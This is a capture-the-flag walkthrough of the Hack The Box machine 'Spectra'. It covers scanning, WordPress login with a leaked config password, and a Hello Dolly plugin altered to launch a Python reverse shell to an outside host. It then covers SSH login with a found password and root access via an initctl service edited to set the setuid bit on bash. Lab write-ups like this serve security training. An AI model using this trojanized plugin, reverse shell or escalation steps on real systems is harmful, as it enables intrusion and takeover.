PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
80/tcp open http nginx 1.17.4
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
3306/tcp open mysql MySQL (unauthorized)
Web Service (nginx - 80)
By clicking on any of these links, we are redirected to a hostname (spectra.htb).
so I added it to my /etc/hosts
10.10.10.229 spectra.htb
Wordpress (1st Link)
Wpscan
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.15
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://spectra.htb/main/ [10.10.10.229]
[+] Started: Mon Mar 8 18:18:35 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: nginx/1.17.4
| - X-Powered-By: PHP/5.6.40
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://spectra.htb/main/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://spectra.htb/main/?feed=rss2, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://spectra.htb/main/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://spectra.htb/main/wp-content/themes/twentynineteen/
| Last Updated: 2020-12-22T00:00:00.000Z
| Readme: http://spectra.htb/main/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 1.9
| Style URL: http://spectra.htb/main/wp-content/themes/twentynineteen/style.css?ver=1.5
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://spectra.htb/main/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'
[i] No plugins Found.
[i] No themes Found.
[i] User(s) Identified:
[+] administrator
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 8 18:19:05 2021
[+] Requests Done: 343
[+] Cached Requests: 48
[+] Data Sent: 91.765 KB
[+] Data Received: 59.735 KB
[+] Memory used: 250.008 MB
[+] Elapsed time: 00:00:30
(user: administrator)
/testing/ (2nd Link)
second link:
So I looked at /testing/ directory.
The file "wp-config.php.save" caught my attention. We can't see the source code from a .php file, but if it's with any other extension we can, like ".php.txt" ou ".php.save".
Looking at the source code we see some interesting things.
We can try to log into wordpress with the user "administrator" that wpscan showed us, with the password "devteam01" that we see in this file.
it works!!
Getting shell
I tried to change some php files, like the header files or some plugins. nothing worked. so I decided to put my own plugin with a reverse shell. For that, I got the "Hello Dolly" plugin (this plugin adds a phrase from the song "hello dolly" at the top of every dashboard page). So I took the only file that makes up this plugin and copied it to my machine, added a reverse shell, made it into a .zip file, uploaded it as a new plugin on the server, activated it, and got a shell.
my hello2.php
/**
* @package Hello_Dolly
* @version 1.7.2
*/
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/
function hello_dolly_get_lyric() {
/** These are the lyrics to Hello Dolly */
$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";
// Here we split it into lines.
$lyrics = explode( "\n", $lyrics );
// And then randomly choose a line.
return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}
// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'');
$chosen = hello_dolly_get_lyric();
$lang = '';
if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
$lang = ' lang="en"';
}
printf(
'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
$lang,
$chosen
);
}
// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );
// We need some CSS to position the paragraph.
function dolly_css() {
echo "
<style type='text/css'>
#dolly {
float: right;
padding: 5px 10px;
margin: 0;
font-size: 12px;
line-height: 1.6666;
}
.rtl #dolly {
float: left;
}
.block-editor-page #dolly {
display: none;
}
@media screen and (max-width: 782px) {
#dolly,
.rtl #dolly {
float: none;
padding-left: 0;
padding-right: 0;
}
}
</style>
";
}
add_action( 'admin_head', 'dolly_css' );
(i put my reverse shell in the "hello_dolly()" function)
uploading the .zip file
by clicking "activate Plugin" we get our shell.
to improve our shell run:
bash -i
export TERM=xterm
User
after some enumerations, I looked at the /opt folder. Here we have something interesting.
looking at this configuration file we have that in "/etc/autologin/passwd" there is probably a password.
Now we have a password. Let's try to find out which user it belongs to. Looking at /etc/passwd this password seems to be for user "katie"
katie:x:20156:20157::/home/katie:/bin/bash
We can try to log in using ssh.
ssh katie@spectra.htb
password: SummerHereWeCome!!
Privilege escalation to root
With user katie we can run "sudo -l" and see that we have permission to run the "initctl" command as root.
sudo -l
User katie may run the following commands on spectra:
(ALL) SETENV: NOPASSWD: /sbin/initctl
"initctl" is a program for managing services. We can create, start, stop or restart a service using it. During the process of starting a service, we can request that it run some commands. We are going to look for a service that we can change this command configuration to run code as root.
cd /etc/init
nano test.conf
description "Test node.js server"
author "katie"
start on filesystem or runlevel [2345]
stop on shutdown
script
chmod +s /bin/bash
export HOME="/srv"
echo $$ > /var/run/nodetest.pid
exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js
end script
pre-start script
echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script
pre-stop script
rm /var/run/nodetest.pid
echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script
I used the settings of the "test" service (test.conf file). I added "chmod +s /bin/bash" to the "script" section in this configuration file. When I run the command to start the service as root, it will run this command also as root. Then we just use "bash -p" to exploit this permission in bash and make it root.
(to put it simply: "chmod +s" turns the binary runnable as root)
